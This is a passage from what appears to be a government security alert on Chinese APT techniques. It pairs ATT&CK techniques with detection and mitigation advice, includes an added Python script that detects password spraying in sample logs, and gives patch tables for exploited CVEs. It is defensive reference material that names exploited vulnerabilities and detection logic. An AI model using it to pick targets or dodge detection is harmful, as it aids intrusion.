\n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. 
\n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly including patches for DLL side-loading vulnerabilities. 
\n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. 
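The Password Spraying entry above says to monitor failed authentications against valid accounts; the script below is an added example (not CISA's code or tooling) of what that monitoring looks like in practice. It groups authentication events by source address and, within a sliding window, separates a spray (many distinct accounts, each kept below the lockout threshold) from a single-account brute force (one account pushed past the threshold), and it reports accounts where a success followed failures from the same source, which is the case that matters for incident response. The log format, the thresholds, and the sample records are constructed for the example and should be mapped to your own sign-in logs and lockout policy.

```python
"""Password-spray vs. brute-force triage over authentication logs.

Added example for this alert, not CISA's code. Format, thresholds and the
sample log are assumptions for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)     # assumed analysis window
LOCKOUT_THRESHOLD = 5           # assumed lockout policy: failures per account
MIN_SPRAYED_ACCOUNTS = 5        # assumed: distinct accounts hit from one source

# Constructed sample log: "ISO-8601 timestamp,source_ip,username,SUCCESS|FAIL".
# 203.0.113.7 sprays six accounts twice each and lands on "dave";
# 198.51.100.9 hammers one account; 192.0.2.5 is a user mistyping once.
SAMPLE_LOG = """
2020-10-01T08:00:01+00:00,203.0.113.7,alice,FAIL
2020-10-01T08:00:04+00:00,203.0.113.7,bob,FAIL
2020-10-01T08:00:07+00:00,203.0.113.7,carol,FAIL
2020-10-01T08:00:10+00:00,203.0.113.7,dave,FAIL
2020-10-01T08:00:13+00:00,203.0.113.7,erin,FAIL
2020-10-01T08:00:16+00:00,203.0.113.7,frank,FAIL
2020-10-01T08:30:01+00:00,203.0.113.7,alice,FAIL
2020-10-01T08:30:04+00:00,203.0.113.7,bob,FAIL
2020-10-01T08:30:07+00:00,203.0.113.7,carol,FAIL
2020-10-01T08:30:10+00:00,203.0.113.7,dave,SUCCESS
2020-10-01T08:30:13+00:00,203.0.113.7,erin,FAIL
2020-10-01T08:30:16+00:00,203.0.113.7,frank,FAIL
2020-10-01T09:00:00+00:00,198.51.100.9,admin,FAIL
2020-10-01T09:00:05+00:00,198.51.100.9,admin,FAIL
2020-10-01T09:00:10+00:00,198.51.100.9,admin,FAIL
2020-10-01T09:00:15+00:00,198.51.100.9,admin,FAIL
2020-10-01T09:00:20+00:00,198.51.100.9,admin,FAIL
2020-10-01T09:00:25+00:00,198.51.100.9,admin,FAIL
2020-10-01T10:00:00+00:00,192.0.2.5,alice,FAIL
2020-10-01T10:00:30+00:00,192.0.2.5,alice,SUCCESS
"""


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    src_ip: str
    user: str
    success: bool


def parse_log(text: str) -> list:
    """Parse the constructed CSV-like format into time-ordered events."""
    events = []
    for line in text.strip().splitlines():
        ts, src_ip, user, result = (f.strip() for f in line.split(","))
        events.append(AuthEvent(datetime.fromisoformat(ts), src_ip,
                                user.lower(), result.upper() == "SUCCESS"))
    return sorted(events, key=lambda e: e.ts)


def _window_stats(evs, start_idx, window):
    """Per-account failure counts, and accounts that succeeded after failing,
    for the events from evs[start_idx] that fall inside `window`."""
    fails = defaultdict(int)
    compromised = []
    t0 = evs[start_idx].ts
    for e in evs[start_idx:]:
        if e.ts - t0 > window:
            break
        if e.success:
            # A success preceded by failures from the same source means the
            # guessed password worked: treat the account as compromised.
            if fails.get(e.user, 0) and e.user not in compromised:
                compromised.append(e.user)
        else:
            fails[e.user] += 1
    return dict(fails), compromised


def detect(events, window=WINDOW, lockout=LOCKOUT_THRESHOLD,
           min_accounts=MIN_SPRAYED_ACCOUNTS):
    """Classify each source IP by its worst window.

    "brute_force": some account was pushed to or past the lockout threshold.
    "password_spray": many distinct accounts, each kept below the threshold.
    Sources that trigger neither (ordinary typos) are omitted.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e.src_ip].append(e)

    findings = {}
    for src, evs in by_src.items():
        best = None
        for i in range(len(evs)):
            fails, compromised = _window_stats(evs, i, window)
            if not fails:
                continue
            key = (len(fails), max(fails.values()))
            if best is None or key > best[0]:
                best = (key, fails, compromised)
        if best is None:
            continue
        (distinct, max_per_account), fails, compromised = best
        if max_per_account >= lockout:
            kind = "brute_force"
        elif distinct >= min_accounts:
            kind = "password_spray"
        else:
            continue
        findings[src] = {
            "kind": kind,
            "accounts_targeted": sorted(fails),
            "max_failures_per_account": max_per_account,
            "compromised": compromised,
        }
    return findings


FINDINGS = detect(parse_log(SAMPLE_LOG))

if __name__ == "__main__":
    for src, f in FINDINGS.items():
        print(f"{src}: {f['kind']} against {len(f['accounts_targeted'])} "
              f"accounts (max {f['max_failures_per_account']} failures each), "
              f"compromised={f['compromised']}")
```

The spray source never exceeds two failures per account, so a lockout-only alert would miss it entirely; counting distinct accounts per source is what surfaces it. In a real deployment the source key should also consider the user agent and the IP ranges of any cloud provider the attacker fronts the spray through, since a single campaign is often spread across many addresses.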
_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)]
 * Detection: Use NIDS to identify scanning activity.
 * Mitigation: Close unnecessary ports and services; segment the network to protect critical servers and devices.

_Email Collection_ [[T1114](<https://attack.mitre.org/techniques/T1114/>)]
 * Detection: Monitor processes and command-line arguments for actions that could be taken to gather local email files.
 * Mitigation: Encrypt sensitive emails; audit auto-forwarding email rules regularly; use MFA for public-facing webmail servers.

_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)]
 * Detection: Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.
 * Mitigation: Use NIDS and NIPS with network signatures to identify traffic of specific adversary malware.

_Drive-by Compromise_ [[T1189](<https://attack.mitre.org/techniques/T1189/>)]
 * Detection: Use firewalls and proxies to inspect URLs for known-bad domains or parameters; use NIDS to detect malicious scripts, and monitor endpoints for abnormal behavior.
 * Mitigation: Isolate and sandbox impacted systems and applications to restrict the spread of malware; use security applications that identify malicious behavior during exploitation; restrict web-based content with ad blockers and script-blocking extensions.

_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)]
 * Detection: Analyze authentication logs, files, and netflow/enclave netflow, and use process monitoring to discover anomalous activity.
 * Mitigation: Patch vulnerabilities in internet-facing applications; use file integrity monitoring to identify file changes; apply the principle of least privilege so that only authorized accounts can modify the web-accessible directory.

_Application Layer Protocol: File Transfer Protocols_ [[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)]
 * Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server); analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could use to conceal data.
 * Mitigation: Use NIDS and NIPS with network signatures to identify traffic of specific adversary malware.

#### Additional APT Activity

The TTPs listed above have been used repeatedly across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce exposure to these TTPs; however, defenders should also maintain heightened awareness of threat actors that are more innovative in their approach, which makes compromise harder to detect and respond to. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:

 * **APT3** (known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing command and control (C2) infrastructure make it difficult to track. APT3 exploits use Rivest Cipher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR) and Data Execution Prevention (DEP) by using return-oriented programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]
 * **APT10** (known as MenuPass Group) has established access to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.
 * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and is adept at using PowerShell for C2 over Hypertext Transfer Protocol (HTTP) and HTTPS.[[15](<https://attack.mitre.org/groups/G0073/>)]
 * **APT40** (known as Leviathan) has successfully targeted external infrastructure, including internet-facing routers and virtual private networks.
 * **APT41** (known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]

### Mitigations

### Recommended Actions

The following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall exposure. These recommendations are not exhaustive; rather, they focus on the actions that will greatly reduce stakeholders’ attack surface.

 1. **Patch systems and equipment promptly and diligently.** Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow remote code execution or denial of service on externally facing (i.e., internet-connected) equipment.
Certain vulnerabilities\u2014including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]\u2014have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.\n\n_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | \n\nMicrosoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n\n| \n\n * [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability 
CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | \n\n * D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825\n| \n\n * [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: 
Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>) \n[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | \n\n * Nostromo 1.9.6 and below\n| \n\n * [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)\n * [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>) \n \n[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) \n[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n \n_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | \n\n 
* Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | \n\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and 
earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0\n * Sentry versions 9.7.2 and earlier, and 9.8.0;\n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | \n\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows 
Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>) \n[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | \n\n * Exim before 4.90.1\n| \n\n * [Exim page for CVE-2020-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)\n * [Exim patch information for CVE-2020-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>) \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n| \n\n * [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | \n\n * ColdFusion Update 5 and earlier versions\n * ColdFusion 11 Update 13 and earlier versions\n| \n\n * [Adobe Security Bulletin 
APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>) \n[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | \n\n * Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0\n| \n\n * [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>) \n[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | \n\n * Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n| \n\n * [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>) \n[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | \n\n * Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2\n| \n\n * [Jira Atlassian Confluence Sever and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>) \n[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | \n\n * Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4\n| \n\n * [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | \n\n * Progress Telerik UI for ASP.NET AJAX through 2019.3.1023\n| \n\n * 
[Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) \n[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1703 for 32-bit Systems\n * Windows 10 Version 1703 for x64-based Systems\n * Windows 10 Version 1709 for 
32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows 8.1 for 32-bit systems\n * Windows 8.1 for x64-based systems\n * Windows RT 8.1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 